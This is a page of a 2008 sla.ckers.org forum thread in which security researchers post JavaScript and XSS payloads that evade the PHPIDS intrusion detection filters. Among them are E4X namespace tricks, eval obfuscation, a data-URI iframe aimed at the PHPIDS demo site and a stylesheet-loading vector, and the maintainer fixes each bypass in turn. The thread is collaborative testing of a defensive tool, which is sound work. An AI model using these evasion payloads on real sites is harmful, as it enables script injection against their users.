Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1718192021222324252627...LastNext
Current Page: 22 of 31
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: September 01, 2008 11:54AM

Quote

@Reiners: What characters are allowed fom MSSQL col names? \w and - or more?

only \w



Edited 1 time(s). Last edit at 09/01/2008 11:54AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 02, 2008 05:01AM

Thx - what about multiple rectangular brackets - like SELECT[[foo]]FROM[[[bar]]] ?

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: September 02, 2008 10:13AM

ah I didnt thought about that, but no, not possible. also you cant use whitespaces or other prefixes inside of the brackets, because everything is considered as column name.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 02, 2008 11:03AM

Phew :) Thanks for testing!

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: September 11, 2008 04:00PM

This is just beautiful :)
Check out the centrifuge evasion.

http://www.businessinfo.co.uk/labs/phpids/phpids3.html

default xml namespace=toolbar,b=1&&this.atob
default xml namespace=toolbar,e2=b('ZXZhbA')
default xml namespace=toolbar,e=this[toolbar,e2]
default xml namespace=toolbar,y=1&&name
default xml namespace=toolbar
default xml namespace=e(y)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: September 11, 2008 06:13PM

stealing Gareth's trick... http://p42.us/phpids/72.html

which injects this:
default xml namespace=toolbar,x='loca'
default xml namespace=toolbar,this[x+'tion']=name


yeah, I'll buy you that beer. You'll join RSnake in the exclusive group of people I've ever bought a beer for :)

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: September 12, 2008 12:30AM

Nice :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 12, 2008 03:54AM

Hi,

wow - this is a beauty indeed! Bloody E4X :)

I bet there's more - I have to get more involved with E4X as soon as I find some time.

Greetings and thx|congrats ;)
.mario

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: September 21, 2008 02:52PM

delete~typeof~typeof~typeof~typeof~typeof~typeof~alert(1)

Here's a way to execute any payload:-
delete~typeof~typeof~typeof~typeof~typeof~typeof~eval(1&&name)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/22/2008 03:03AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: September 22, 2008 02:13PM

nice one, gareth!

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 25, 2008 05:28PM

Nice - indeed. I forgot to answer here after we chatted ;)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Kyo
Date: October 10, 2008 12:22AM

What're you talking about, catholic people get to watch porn

as long as it's two married people having sex in the videos

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thrill
Date: October 10, 2008 12:44AM

heh.. reminds me of a time when my ex-wife and I went to a store to buy a new bed.. the lady came up and asked "are you married", I answered "yes, but not to each other!".. she quickly walked away.. so porn between two people that are married is not a bad thing.. unless they're married to each other! ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Kyo
Date: October 10, 2008 07:45AM

Interesting, I somehow managed to post this in the wrong thread in the wrong forum

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 10, 2008 02:29PM

lol and thrill also replied

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Reiners
Date: October 18, 2008 01:01PM

hm this little one slipped through by time:

'<~' http://demo.php-ids.org/?test=%27%3C%7E%27

grüße!



Edited 1 time(s). Last edit at 10/18/2008 01:02PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 19, 2008 07:47AM

A bug indeed - thanks for pointing out! fixed.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 25, 2008 10:04AM

data:text/html,<iframe%20src="http://demo.phpids.org?test=%25C2%25AA%25C2%25AA%253D1%2526%2526name%250A%25C2%25AA%253D1%2526%2526window.eval%252C1%250A%25C2%25AA(%25C2%25AA%25C2%25AA)"%20name="alert(1)"></iframe>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 25, 2008 09:26PM

Uaaah - 3am. Coming home - being drunq - finding this and asking one self existential questions - fixing it - all good ;)

Again - an incredible circumvention. Wow. Man Gareth - too bad you can't come to Portugal!

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 25, 2008 10:32PM

don't drink and regex

injection is essentially the same as Gareth's, I just recoded to eliminate the &&'s:
y=1+name
x=0?[]:window.eval
x(y)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thrill
Date: October 25, 2008 10:47PM

For that matter, don't drink and internet!!!!!!!!!!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 25, 2008 11:31PM

shortened a bit to:
x=this.eval
x(0?$:name+1)



Edited 1 time(s). Last edit at 10/25/2008 11:32PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: kuza55
Date: October 26, 2008 12:19AM

22 pages and still going strong, that doesn't really bode well for IDS systems does it?

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 26, 2008 07:55AM

@thornmaker

Nice variations :)

@mario

Shame I couldn't go I'd like to :(

@kuza55

Any IDS system can be broken eventually, the trick is creating the least insecure one :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 26, 2008 08:08AM

Nice ones - thx!!! Gareth's injection btw uncovered a nasty bug in one of the converter rules when dealing with RTL/LTR characters.

@thrill: Sometimes you gotta do what you gotta do.

@kuza55: About 461K bug entries for Firefox - that doesn't really bode well for browsers does it? (It really doesn't but I am sure you are getting my point)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 26, 2008 04:53PM

You gotta love expressions :)

IE only vector:-
document.createStyleSheet('http://businessinfo.co.uk/labs/xss/xss.css')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 27, 2008 02:07PM

I'm surprised these aren't picked up by the centrifuge. Code for this one is:
y='nam'
x=this.eval
x(x(y+ ('e')+new Array)+y)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 27, 2008 03:00PM

@thornmaker

Nice :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 27, 2008 06:48PM

Lame excuse - I know - but there is something wrong with our server.

I already contacted the admins. The vector generates an impact on my local demo and with the unit tests - but not on the remote box. I tried some live debugging but couldn't find anything besides a very weird acting regex. I applied some (hot)-fixes to the rules but haven't found the main issue yet.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: kuza55
Date: October 27, 2008 07:57PM

.mario Wrote:
-------------------------------------------------------
> @kuza55: About 461K bug entries for Firefox - that
> doesn't really bode well for browsers does it? (It
> really doesn't but I am sure you are getting my
> point)

No, it doesn't.

However, I've been subscribed to the firefox new bugs list in my rss reader for the last week, and a lot of the bugs are feature requests, or bugs which have zero security impact, or may have a crash if the user does a bunch of actions.

Contrast this with an IDS where almost any bug is a security issue.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Pages: PreviousFirst...1718192021222324252627...LastNext
Current Page: 22 of 31


Sorry, only registered users may post in this forum.